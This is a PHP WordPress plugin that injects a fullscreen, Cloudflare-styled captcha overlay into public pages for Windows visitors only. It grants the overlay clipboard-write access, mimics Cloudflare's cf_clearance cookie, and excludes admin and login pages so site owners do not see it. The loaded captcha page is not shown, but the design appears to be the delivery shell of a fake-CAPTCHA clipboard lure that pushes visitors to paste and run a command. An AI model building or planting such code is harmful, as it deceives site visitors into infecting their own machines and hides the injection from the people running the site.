<?php
/**
 * Plugin Name: CF Captcha - Windows Only
 * Description: Shows a Cloudflare-style captcha overlay to Windows visitors. Sets a 90-day cookie after completion. Excludes wp-login and admin pages.
 * Version: 1.1.0
 * Author: CF Security
 * License: GPL v2 or later
 */

if (!defined('ABSPATH')) exit;

class CF_Captcha_Windows {

    private static $instance = null;
    private $cookie_name = 'cf_clearance';
    private $cookie_days = 90;

    public static function init() {
        if (self::$instance === null) {
            self::$instance = new self();
        }
        return self::$instance;
    }

    public function __construct() {
        add_action('template_redirect', array($this, 'maybe_show_captcha'));
    }

    public function maybe_show_captcha() {
        // Skip admin pages
        if (is_admin()) return;

        // Skip wp-login.php
        if (strpos($_SERVER['REQUEST_URI'], 'wp-login') !== false) return;

        // Skip wp-admin
        if (strpos($_SERVER['REQUEST_URI'], 'wp-admin') !== false) return;

        // Skip AJAX, REST, cron
        if (defined('DOING_AJAX') && DOING_AJAX) return;
        if (defined('REST_REQUEST') && REST_REQUEST) return;
        if (defined('DOING_CRON') && DOING_CRON) return;

        // Skip if cookie already set (server-side check)
        if (isset($_COOKIE[$this->cookie_name])) return;

        // Inject the iframe overlay via wp_footer
        add_action('wp_footer', array($this, 'render_iframe_overlay'));
    }

    public function render_iframe_overlay() {
        $captcha_url = plugin_dir_url(__FILE__) . 'captcha.html';
        $cookie_name = $this->cookie_name;
        $cookie_days = $this->cookie_days;
        ?>
        <script>
        (function() {
            // Only for Windows users
            if (!/Windows/.test(navigator.userAgent)) return;

            // Skip if cookie already exists (client-side check)
            if (document.cookie.indexOf('<?php echo esc_js($cookie_name); ?>=') !== -1) return;

            // Create fullscreen iframe overlay
            var overlay = document.createElement('div');
            overlay.id = 'cf-captcha-overlay';
            overlay.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;z-index:2147483647;background:#fff;';

            var iframe = document.createElement('iframe');
            iframe.src = '<?php echo esc_url($captcha_url); ?>';
            iframe.style.cssText = 'width:100%;height:100%;border:none;';
            iframe.setAttribute('allow', 'clipboard-write');

            overlay.appendChild(iframe);
            document.body.appendChild(overlay);

            // Block scrolling on the main page
            document.documentElement.style.overflow = 'hidden';

            // Listen for completion message from the iframe
            window.addEventListener('message', function(e) {
                if (e.data === 'cf-captcha-verified') {
                    // Set cookie
                    var d = new Date();
                    d.setTime(d.getTime() + (<?php echo (int)$cookie_days; ?> * 24 * 60 * 60 * 1000));
                    document.cookie = '<?php echo esc_js($cookie_name); ?>=1;expires=' + d.toUTCString() + ';path=/;SameSite=Lax';

                    // Remove overlay after short delay for success animation
                    setTimeout(function() {
                        var ov = document.getElementById('cf-captcha-overlay');
                        if (ov) ov.parentNode.removeChild(ov);
                        document.documentElement.style.overflow = '';
                    }, 1500);
                }
            });
        })();
        </script>
        <?php
    }
}

CF_Captcha_Windows::init();